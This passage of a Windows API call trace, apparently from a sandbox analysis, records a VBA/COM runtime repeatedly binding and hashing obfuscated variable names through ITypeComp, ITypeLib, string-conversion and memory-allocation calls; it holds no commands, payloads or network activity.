_Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a6286e | out: _Dst=0x67c2d40) returned 0x0 [0069.172] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_toDcAAA") returned 0x10aa2b [0069.172] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_toDcAAA" | out: _Dst="_B_var_toDcAAA") returned 0x0 [0069.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_toDcAAA") returned 15 [0069.172] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.172] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_toDcAAA", lHashVal=0x10aa2b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.172] IUnknown:Release (This=0x665ba50) returned 0xd [0069.172] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.172] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_toDcAAA", lHashVal=0x10aa2b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.172] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.172] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.172] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_toDcAAA", lHashVal=0x10aa2b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.172] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.172] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.172] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_toDcAAA", lHashVal=0x10aa2b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.172] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.172] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.172] IUnknown:Release (This=0x665ba50) returned 0xd [0069.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b116fe, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_toDcAAA") returned 15 [0069.172] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_toDcAAA", lHashVal=0x10aa2b, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0) returned 0x0 [0069.172] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a6286e | out: _Dst=0x144ec0) returned 0x0 [0069.173] IMalloc:Realloc (This=0x7fefec05380, pv=0xafc7910, cb=0x300) returned 0xaf68180 [0069.173] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x7ca0000 [0069.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62962, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="rUkDx4AU") returned 9 [0069.174] ITypeComp:RemoteBind (in: This=0x665ba60, szName="rUkDx4AU", lHashVal=0x1062c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62962, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="rUkDx4AU") returned 9 [0069.174] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="rUkDx4AU", lHashVal=0x1062c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62962, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="rUkDx4AU") returned 9 [0069.174] ITypeComp:RemoteBind (in: This=0x665bd30, szName="rUkDx4AU", lHashVal=0x1062c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.174] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rUkDx4AU") returned 0x1062c5 [0069.174] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="rUkDx4AU" | out: _Dst="rUkDx4AU") returned 0x0 [0069.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="rUkDx4AU") returned 9 [0069.174] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.175] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="rUkDx4AU", lHashVal=0x1062c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.175] IUnknown:Release (This=0x665ba50) returned 0xd [0069.175] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.175] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="rUkDx4AU", lHashVal=0x1062c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.175] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.175] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.175] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="rUkDx4AU", lHashVal=0x1062c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.175] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.175] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.175] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="rUkDx4AU", lHashVal=0x1062c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.175] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62962, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="rUkDx4AU") returned 9 [0069.175] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="rUkDx4AU", lHashVal=0x1062c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.175] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.175] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62962 | out: _Dst=0x67c2d40) returned 0x0 [0069.175] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_rUkDx4AU") returned 0x103a4e [0069.175] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_rUkDx4AU" | out: _Dst="_B_var_rUkDx4AU") returned 0x0 [0069.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_rUkDx4AU") returned 16 [0069.175] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.175] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_rUkDx4AU", lHashVal=0x103a4e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.175] IUnknown:Release (This=0x665ba50) returned 0xd [0069.175] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.175] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_rUkDx4AU", lHashVal=0x103a4e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.175] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.175] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.175] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_rUkDx4AU", lHashVal=0x103a4e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.175] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.175] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.175] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_rUkDx4AU", lHashVal=0x103a4e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.175] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.175] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.175] IUnknown:Release (This=0x665ba50) returned 0xd [0069.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1172e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_rUkDx4AU") returned 16 [0069.176] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_rUkDx4AU", lHashVal=0x103a4e, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x78004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x78004400000000, pDummy=0x0) returned 0x0 [0069.176] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62962 | out: _Dst=0x144ec0) returned 0x0 [0069.176] ITypeComp:RemoteBind (in: This=0x665ba60, szName="pQAGCcZ", lHashVal=0x1040f4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6293a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="pQAGCcZ") returned 8 [0069.176] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="pQAGCcZ", lHashVal=0x1040f4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6293a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="pQAGCcZ") returned 8 [0069.176] ITypeComp:RemoteBind (in: This=0x665bd30, szName="pQAGCcZ", lHashVal=0x1040f4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.176] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pQAGCcZ") returned 0x1040f4 [0069.176] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="pQAGCcZ" | out: _Dst="pQAGCcZ") returned 0x0 [0069.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="pQAGCcZ") returned 8 [0069.176] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.176] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="pQAGCcZ", lHashVal=0x1040f4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.176] IUnknown:Release (This=0x665ba50) returned 0xd [0069.176] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.176] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="pQAGCcZ", lHashVal=0x1040f4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.176] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.176] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.176] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="pQAGCcZ", lHashVal=0x1040f4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.176] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.176] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.176] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="pQAGCcZ", lHashVal=0x1040f4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.176] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6293a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="pQAGCcZ") returned 8 [0069.176] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="pQAGCcZ", lHashVal=0x1040f4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.177] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.177] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a6293a | out: _Dst=0x67c2d40) returned 0x0 [0069.177] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_pQAGCcZ") returned 0x104478 [0069.177] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_pQAGCcZ" | out: _Dst="_B_var_pQAGCcZ") returned 0x0 [0069.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_pQAGCcZ") returned 15 [0069.177] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.177] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_pQAGCcZ", lHashVal=0x104478, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.177] IUnknown:Release (This=0x665ba50) returned 0xd [0069.177] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.177] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_pQAGCcZ", lHashVal=0x104478, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.177] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.177] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.177] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_pQAGCcZ", lHashVal=0x104478, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.177] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.177] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.177] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_pQAGCcZ", lHashVal=0x104478, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.177] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.177] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.177] IUnknown:Release (This=0x665ba50) returned 0xd [0069.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1175e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_pQAGCcZ") returned 15 [0069.177] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_pQAGCcZ", lHashVal=0x104478, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x43004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x43004700000000, pDummy=0x0) returned 0x0 [0069.177] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a6293a | out: _Dst=0x144ec0) returned 0x0 [0069.177] ITypeComp:RemoteBind (in: This=0x665ba60, szName="WAoU11c4", lHashVal=0x10676c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6298e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WAoU11c4") returned 9 [0069.178] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="WAoU11c4", lHashVal=0x10676c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6298e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WAoU11c4") returned 9 [0069.178] ITypeComp:RemoteBind (in: This=0x665bd30, szName="WAoU11c4", lHashVal=0x10676c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.178] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WAoU11c4") returned 0x10676c [0069.178] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="WAoU11c4" | out: _Dst="WAoU11c4") returned 0x0 [0069.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="WAoU11c4") returned 9 [0069.178] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.178] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="WAoU11c4", lHashVal=0x10676c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.178] IUnknown:Release (This=0x665ba50) returned 0xd [0069.178] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.178] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="WAoU11c4", lHashVal=0x10676c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.178] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.178] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.178] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="WAoU11c4", lHashVal=0x10676c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.178] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.178] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.178] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="WAoU11c4", lHashVal=0x10676c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.178] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6298e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WAoU11c4") returned 9 [0069.178] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="WAoU11c4", lHashVal=0x10676c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.178] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.178] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a6298e | out: _Dst=0x67c2d40) returned 0x0 [0069.178] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_WAoU11c4") returned 0x103ef5 [0069.178] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_WAoU11c4" | out: _Dst="_B_var_WAoU11c4") returned 0x0 [0069.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_WAoU11c4") returned 16 [0069.179] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.179] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_WAoU11c4", lHashVal=0x103ef5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.179] IUnknown:Release (This=0x665ba50) returned 0xd [0069.179] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.179] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_WAoU11c4", lHashVal=0x103ef5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.179] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.179] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.179] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_WAoU11c4", lHashVal=0x103ef5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.179] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.179] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.179] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_WAoU11c4", lHashVal=0x103ef5, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.179] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.179] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.179] IUnknown:Release (This=0x665ba50) returned 0xd [0069.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1178e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_WAoU11c4") returned 16 [0069.179] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_WAoU11c4", lHashVal=0x103ef5, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x31005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x31005500000000, pDummy=0x0) returned 0x0 [0069.179] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a6298e | out: _Dst=0x144ec0) returned 0x0 [0069.179] ITypeComp:RemoteBind (in: This=0x665ba60, szName="oUAAAxAQ", lHashVal=0x10d59c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a629ba, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="oUAAAxAQ") returned 9 [0069.179] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="oUAAAxAQ", lHashVal=0x10d59c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a629ba, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="oUAAAxAQ") returned 9 [0069.179] ITypeComp:RemoteBind (in: This=0x665bd30, szName="oUAAAxAQ", lHashVal=0x10d59c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.180] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oUAAAxAQ") returned 0x10d59c [0069.180] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="oUAAAxAQ" | out: _Dst="oUAAAxAQ") returned 0x0 [0069.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: 